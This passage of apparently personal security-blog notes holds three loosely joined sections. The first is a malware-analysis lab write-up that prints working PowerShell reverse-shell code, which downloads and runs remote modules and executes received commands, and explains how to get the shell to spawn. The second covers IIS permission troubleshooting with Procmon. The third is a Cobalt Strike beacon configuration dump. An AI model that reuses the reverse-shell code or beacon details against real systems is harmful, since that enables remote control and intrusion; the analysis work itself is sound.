      [byte[]]$bytes = 0..20000|%{0}
      $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
      $stream.Write($sendbytes,0,$sendbytes.Length)
     
      if ($Download -eq "true")
      {
          $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
          $stream.Write($sendbytes,0,$sendbytes.Length)
          ForEach ($module in $modules)
          {
              (Get-Webclient).DownloadString($module)|Invoke-Expression
          }
      }
     
      $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
      $stream.Write($sendbytes,0,$sendbytes.Length)
     
      while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
      {
          $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
          $data = $EncodedText.GetString($bytes,0, $i)
          $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
     
          $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
          $x = ($error[0] | Out-String)
          $error.clear()
          $sendback2 = $sendback2 + $x
     
          $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
          $stream.Write($sendbyte,0,$sendbyte.Length)
          $stream.Flush()  
      }
      $client.Close()
      $listener.Stop()
      }
  }
     
  powerfun -Command reverse -Sslcon true
     
  

• What is the callback protocol at detonation?

  R= From the packet capture in the loopback interface, we can observe the callback protocol is TLS1.2

  

• How can you use host-based telemetry to identify the DNS record, port, and protocol?

  R= Filtering by PPID (it being the vaue of putty.exe), we are able to get the protocol (TCP), DNS record (bonus2.corporatebonusapplication.local) and port (8443)

  

• Attempt to get the binary to initiate a shell on the localhost. Does a shell spawn? What is needed for a shell to spawn?

  R= It does, a powershell shell. We need to add the domain bonus2.corporatebonusapplication.local into our “victim” machine localhosts file, then, within the same machine we open a netcat listener to port 8443 using the --ssl flag, as it will not connect to it if there is no successful handshake.

I’ve been using a bunch of tools from the SysInternals for a while now (mainly Process Explorer, Process monitor and Tcpview), few tools are as useful as this when there’s the need to troubleshoot somethig in Windows (talking specifically about third-party software). I believe I onced faced this issue when I was an intern, and a senior engineer helped me solving this. The thing is, that the procedure the engineer did was to add “likely” Windows/IIS accounts that could’ve been the root cause of this issue, I remember it took a bit of time doing this trial-and-error procedure.

Today when I saw this issue, I thought: Some IIS process must not be able to access the folder of my website. Process Monitor would be an excellent option to use here, as it tracks all the system activities that happen. So let’s get hands on work…

The procedure I follow is:

1. Open Procmon and let it run for a few seconds
2. Eliminate process names that - in my criteria - are only noise. In my case, these are the processes that I added an exception for

1. Start the capture again and then reproduce the issue.
2. Look for indicators that could tell the root cause of the issue. If needed repeat step 2.

From the book “Troubleshooting with the Windows Sysinternals Tools.pdf”, I know that I should be looking for an ACCESS DENIED value in the Result column.

When applying the filter, we can state with confidence that the root cause of this issue is:

Reading the third entry, there’s what seems to be a built-in account NT AUTHORITY\IUSR that the process w3wp.exe is attempting to read the contents of the folder C:\Users\Administrator\Documents\website

Investigating this account this MS article states the following:

This built-in account does not need a password and will be the default identity that is used when anonymous authentication is enabled.

In my case, this makes sense as I do have anonymousAuthentication set as true.

All this information that we have reviewed, indicates that we need to give NT AUTHORITY\IUSR reading permission to the folder C:\Users\Administrator\Documents\website. Once that’s done, we are now able to access

While watching a video called Cobalt Strike from a Blue Team Perspective, one of the exponents - Didier Stevens - utilized a tool that I wasn’t aware of 1768.py.

It let’s you get more context on this threat such as the process it is targeting to inject shellcode rundll32.exe in this case; the Team Server IP 192.168.1.5, port used 3334, type of payload windows-beacon_http-revers_http, among other.

Output retrieved utilizing a beacon file I got from a HackTheBox sherlock room.

remnux@remnux:~/path$ python3 1768.py cs-windows.exe 
File: cs-windows.exe
payloadType: 0x00002610
payloadSize: 0x00040200
intxorkey: 0x56efb653
id2: 0x00000000
MZ header found position 4
Config found: xorkey b'.' 0x0003aa30 0x000401fc
0x0001 payload type                     0x0001 0x0002 0 windows-beacon_http-reverse_http
0x0002 port                             0x0001 0x0002 3334
0x0003 sleeptime                        0x0002 0x0004 60000
0x0004 maxgetsize                       0x0002 0x0004 1048576
0x0005 jitter                           0x0001 0x0002 0
0x0007 publickey                        0x0003 0x0100 30819f300d06092a864886f70d010101050003818d00308189028181009872e9417999ab6cc4b5b541e04dae76bd09ff8c6cdb26ec4adfdf376d12624b4774c6f104a637c9d8d12da6d6412fdca185ff082306cc043a898f87ee56f52c1eb436e99931bf42ab12eb88a3ad01519e3715cbe2d55179e79b7834bd7030e30fa33f4d731a5227567e026e2f95a1934a0fc5c71ebfd3f321f9440c71962f3b020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0x0008 server,get-uri                   0x0003 0x0100 '192.168.1.5,/visit.js'
0x0043 DNS_STRATEGY                     0x0001 0x0002 1
0x0044 DNS_STRATEGY_ROTATE_SECONDS      0x0002 0x0004 -1
0x0045 DNS_STRATEGY_FAIL_X              0x0002 0x0004 -1
0x0046 DNS_STRATEGY_FAIL_SECONDS        0x0002 0x0004 -1
0x000e SpawnTo                          0x0003 0x0010 (NULL ...)
0x001d spawnto_x86                      0x0003 0x0040 '%windir%\\syswow64\\rundll32.exe'
0x001e spawnto_x64                      0x0003 0x0040 '%windir%\\sysnative\\rundll32.exe'
0x001f CryptoScheme                     0x0001 0x0002 0
0x001a get-verb                         0x0003 0x0010 'GET'
0x001b post-verb                        0x0003 0x0010 'POST'
0x001c HttpPostChunk                    0x0002 0x0004 0
0x0025 license-id                       0x0002 0x0004 426352781
0x0026 bStageCleanup                    0x0001 0x0002 0
0x0027 bCFGCaution                      0x0001 0x0002 0
0x0009 useragent                        0x0003 0x0100 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MASAJS)'
0x000a post-uri                         0x0003 0x0040 '/submit.php'
0x000b Malleable_C2_Instructions        0x0003 0x0100
  Transform Input: [7:Input,4]
   Print
0x000c http_get_header                  0x0003 0x0200
  Build Metadata: [7:Metadata,3,6:Cookie]
   BASE64
   Header Cookie
0x000d http_post_header                 0x0003 0x0200
  Const_header Content-Type: application/octet-stream
  Build SessionId: [7:SessionId,5:id]
   Parameter id
  Build Output: [7:Output,4]
   Print
0x0036 HostHeader                       0x0003 0x0080 (NULL ...)
0x0032 UsesCookies                      0x0001 0x0002 1
0x0023 proxy_type                       0x0001 0x0002 1 no proxy
0x003a TCP_FRAME_HEADER                 0x0003 0x0080 '\x00\x04'
0x0039 SMB_FRAME_HEADER                 0x0003 0x0080 '\x00\x04'
0x0037 EXIT_FUNK                        0x0001 0x0002 0
0x0028 killdate                         0x0002 0x0004 0
0x0029 textSectionEnd                   0x0002 0x0004 0
0x002b process-inject-start-rwx         0x0001 0x0002 64 PAGE_EXECUTE_READWRITE
0x002c process-inject-use-rwx           0x0001 0x0002 64 PAGE_EXECUTE_READWRITE
0x002d process-inject-min_alloc         0x0002 0x0004 0
0x002e process-inject-transform-x86     0x0003 0x0100 (NULL ...)
0x002f process-inject-transform-x64     0x0003 0x0100 (NULL ...)
0x0035 process-inject-stub              0x0003 0x0010 (NULL ...)
0x0033 process-inject-execute           0x0003 0x0080 '\x01\x02\x03\x04'
0x0034 process-inject-allocation-method 0x0001 0x0002 0
0x0000
Guessing Cobalt Strike version: 4.3 (max 0x0046)
Sanity check Cobalt Strike config: OK
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x0000feb9 (LSFIF: b't3E;')
Public key config entry found: 0x0003aa60 (xorKey 0x2e) (LSFIF: b'././.,...,./.,#(.-.,.*..')
Public key header found: 0x0003aa66 (xorKey 0x2e) (LSFIF: b'N.*.,.*.>...+./.,...).-/.')
remnux@remnux:~/path$